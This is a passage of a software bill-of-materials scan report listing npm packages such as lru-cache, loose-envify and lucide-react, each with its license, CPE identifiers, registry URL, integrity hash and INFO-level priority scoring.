|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f161741909d3d58f
|
|
name: lodash.isstring
|
|
version: 4.0.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lodash.isstring:lodash.isstring:4.0.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lodash.isstring@4.0.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lodash.isstring/-/lodash.isstring-4.0.1.tgz
|
|
integrity: sha512-0wJxfxH1wgO3GrbuP+dTTk7op+6L41QCXbGINEmD+ny/G/eCqGzxyCsh7159S+mgDDcoarnBw6PC1PS5+wUGgw==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 7962026049b4f49e
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lodash.once 4.1.1'
|
|
title: lodash.once 4.1.1
|
|
description: 'Package discovered: lodash.once 4.1.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: f5ead8ead936acd7
|
|
name: lodash.once
|
|
version: 4.1.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lodash.once:lodash.once:4.1.1:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lodash.once@4.1.1
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lodash.once/-/lodash.once-4.1.1.tgz
|
|
integrity: sha512-Sb487aTOCr9drQVL8pIxOzVhafOjZN9UU54hiN8PU3uAiSV7lx1yYNpbNmex2PK6dSJoNTSJUUswT651yww3Mg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: cf9c5c396fa8379f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: long 5.3.2'
|
|
title: long 5.3.2
|
|
description: 'Package discovered: long 5.3.2'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 22165934193ce3c8
|
|
name: long
|
|
version: 5.3.2
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: Apache-2.0
|
|
spdxExpression: Apache-2.0
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:long:long:5.3.2:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/long@5.3.2
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/long/-/long-5.3.2.tgz
|
|
integrity: sha512-mNAgZ1GmyNhD7AuqnTG3/VQ26o760+ZYBPKjPvugO8+nLbYfX6TVpJPseBvopbdY+qpZ/lKUnmEc1LeZYS3QAA==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 4615c5000eb45f3d
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: loose-envify 1.4.0'
|
|
title: loose-envify 1.4.0
|
|
description: 'Package discovered: loose-envify 1.4.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 01ac139389c8bf08
|
|
name: loose-envify
|
|
version: 1.4.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:loose-envify:loose-envify:1.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:loose-envify:loose_envify:1.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:loose_envify:loose-envify:1.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:loose_envify:loose_envify:1.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:loose:loose-envify:1.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:loose:loose_envify:1.4.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/loose-envify@1.4.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/loose-envify/-/loose-envify-1.4.0.tgz
|
|
integrity: sha512-lyuxPGr/Wfhrlem2CL/UcnUc1zcqKAImBDzukY7Y5F/yQiNdko6+fRLevlw1HgMySw7f611UIY408EtxRSoK3Q==
|
|
dependencies:
|
|
js-tokens: ^3.0.0 || ^4.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 8bf9ffa72cfbe889
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lru-cache 10.4.3'
|
|
title: lru-cache 10.4.3
|
|
description: 'Package discovered: lru-cache 10.4.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d68cb2f643232396
|
|
name: lru-cache
|
|
version: 10.4.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:isaacs:lru-cache:10.4.3:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/lru-cache@10.4.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lru-cache/-/lru-cache-10.4.3.tgz
|
|
integrity: sha512-JNAzZcXrCt42VGLuYz0zfAzDfAvJWW6AfYlDBQyDV5DClI2m5sAmK+OIO7s59XfsRsWHp02jAJrRadPRGTt6SQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: a08719993444a9bd
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lru-cache 6.0.0'
|
|
title: lru-cache 6.0.0
|
|
description: 'Package discovered: lru-cache 6.0.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 3a3d54b6437f39f3
|
|
name: lru-cache
|
|
version: 6.0.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:isaacs:lru-cache:6.0.0:*:*:*:*:node.js:*:*
|
|
source: nvd-cpe-dictionary
|
|
purl: pkg:npm/lru-cache@6.0.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lru-cache/-/lru-cache-6.0.0.tgz
|
|
integrity: sha512-Jo6dJ04CmSjuznwJSS3pUeWmd/H0ffTlkXXgwZi+eq1UCmqQwCh+eLsYOYCwY991i2Fah4h1BEMCx4qThGbsiA==
|
|
dependencies:
|
|
yallist: ^4.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: fb9befbc81581725
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lru-memoizer 2.3.0'
|
|
title: lru-memoizer 2.3.0
|
|
description: 'Package discovered: lru-memoizer 2.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: adf63f866928cf12
|
|
name: lru-memoizer
|
|
version: 2.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lru-memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lru-memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lru_memoizer:lru-memoizer:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lru_memoizer:lru_memoizer:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lru:lru-memoizer:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lru:lru_memoizer:2.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lru-memoizer@2.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lru-memoizer/-/lru-memoizer-2.3.0.tgz
|
|
integrity: sha512-GXn7gyHAMhO13WSKrIiNfztwxodVsP8IoZ3XfrJV4yH2x0/OeTO/FIaAHTY5YekdGgW94njfuKmyyt1E0mR6Ug==
|
|
dependencies:
|
|
lodash.clonedeep: ^4.5.0
|
|
lru-cache: 6.0.0
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 03f163b26dd00375
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: lucide-react 0.376.0'
|
|
title: lucide-react 0.376.0
|
|
description: 'Package discovered: lucide-react 0.376.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 9a372e50af0fe0ae
|
|
name: lucide-react
|
|
version: 0.376.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: ISC
|
|
spdxExpression: ISC
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:lucide-react:lucide-react:0.376.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lucide-react:lucide_react:0.376.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lucide_react:lucide-react:0.376.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lucide_react:lucide_react:0.376.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lucide:lucide-react:0.376.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:lucide:lucide_react:0.376.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/lucide-react@0.376.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/lucide-react/-/lucide-react-0.376.0.tgz
|
|
integrity: sha512-g91IX3ERD6yUR1TL2dsL4BkcGygpZz/EsqjAeL/kcRQV0EApIOr/9eBfKhYOVyQIcGGuotFGjF3xKLHMEz+b7g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 0f65ff516206127f
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: math-intrinsics 1.1.0'
|
|
title: math-intrinsics 1.1.0
|
|
description: 'Package discovered: math-intrinsics 1.1.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 87a83232f7674dbc
|
|
name: math-intrinsics
|
|
version: 1.1.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:math-intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:math-intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:math_intrinsics:math-intrinsics:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:math_intrinsics:math_intrinsics:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:math:math-intrinsics:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:math:math_intrinsics:1.1.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/math-intrinsics@1.1.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/math-intrinsics/-/math-intrinsics-1.1.0.tgz
|
|
integrity: sha512-/IXtbwEk5HTPyEwyKX6hGkYXxM9nbj64B+ilVJnC/R6B0pH5G4V3b0pVbL7DBj4tkhBAppbQUlf6F6Xl9LHu1g==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 9efbed3ea63ec0cc
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: media-engine 1.0.3'
|
|
title: media-engine 1.0.3
|
|
description: 'Package discovered: media-engine 1.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 1dbf081258d17462
|
|
name: media-engine
|
|
version: 1.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:media-engine:media-engine:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:media-engine:media_engine:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:media_engine:media-engine:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:media_engine:media_engine:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:media:media-engine:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:media:media_engine:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/media-engine@1.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/media-engine/-/media-engine-1.0.3.tgz
|
|
integrity: sha512-aa5tG6sDoK+k70B9iEX1NeyfT8ObCKhNDs6lJVpwF6r8vhUfuKMslIcirq6HIUYuuUYLefcEQOn9bSBOvawtwg==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: 6ecc4376357a6aa5
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: media-typer 0.3.0'
|
|
title: media-typer 0.3.0
|
|
description: 'Package discovered: media-typer 0.3.0'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: d88fe6586764efc9
|
|
name: media-typer
|
|
version: 0.3.0
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:media-typer:media-typer:0.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:media-typer:media_typer:0.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:media_typer:media-typer:0.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:media_typer:media_typer:0.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:media:media-typer:0.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:media:media_typer:0.3.0:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/media-typer@0.3.0
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/media-typer/-/media-typer-0.3.0.tgz
|
|
integrity: sha512-dq+qelQ9akHpcOl/gUVRTxVIOkAJ1wR3QAvb4RsVjS8oVoFjDGTc679wJYmUmknUF5HwMLOgb5O+a3KxfWapPQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: d32acd7a2e9bf402
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: merge-descriptors 1.0.3'
|
|
title: merge-descriptors 1.0.3
|
|
description: 'Package discovered: merge-descriptors 1.0.3'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 670d71ff9d8ed75e
|
|
name: merge-descriptors
|
|
version: 1.0.3
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
licenses:
|
|
- value: MIT
|
|
spdxExpression: MIT
|
|
type: declared
|
|
urls: []
|
|
locations:
|
|
- path: /package-lock.json
|
|
accessPath: /package-lock.json
|
|
annotations:
|
|
evidence: primary
|
|
language: javascript
|
|
cpes:
|
|
- cpe: cpe:2.3:a:merge-descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:merge-descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:merge_descriptors:merge-descriptors:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:merge_descriptors:merge_descriptors:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:merge:merge-descriptors:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
- cpe: cpe:2.3:a:merge:merge_descriptors:1.0.3:*:*:*:*:*:*:*
|
|
source: syft-generated
|
|
purl: pkg:npm/merge-descriptors@1.0.3
|
|
metadataType: javascript-npm-package-lock-entry
|
|
metadata:
|
|
resolved: https://registry.npmjs.org/merge-descriptors/-/merge-descriptors-1.0.3.tgz
|
|
integrity: sha512-gaNvAS7TZ897/rVaZ0nMtAyxNyi/pdbjbAwUpFQpN70GqnVfOiXpeUUMKRBmzXaSQ8DdTX4/0ms62r2K+hE6mQ==
|
|
dependencies: null
|
|
compliance:
|
|
cisControlsV8_1: *id010
|
|
nistCsf2_0:
|
|
- *id011
|
|
- *id012
|
|
pciDss4_0:
|
|
- *id013
|
|
- *id014
|
|
mitreAttack:
|
|
- *id015
|
|
priority:
|
|
priority: 3.333333333333333
|
|
epss: null
|
|
epss_percentile: null
|
|
is_kev: false
|
|
kev_due_date: null
|
|
components:
|
|
severity_score: 1
|
|
epss_multiplier: 1.0
|
|
kev_multiplier: 1.0
|
|
reachability_multiplier: 1.0
|
|
- schemaVersion: 1.2.0
|
|
id: b81185034826e168
|
|
ruleId: SBOM.PACKAGE
|
|
severity: INFO
|
|
tool:
|
|
name: syft
|
|
version: unknown
|
|
location:
|
|
path: /package-lock.json
|
|
startLine: 0
|
|
message: 'Package discovered: merge2 1.4.1'
|
|
title: merge2 1.4.1
|
|
description: 'Package discovered: merge2 1.4.1'
|
|
remediation: Track and scan dependencies.
|
|
references: []
|
|
tags:
|
|
- sbom
|
|
- package
|
|
raw:
|
|
id: 49cc3c07a1505404
|
|
name: merge2
|
|
version: 1.4.1
|
|
type: npm
|
|
foundBy: javascript-lock-cataloger
|
|
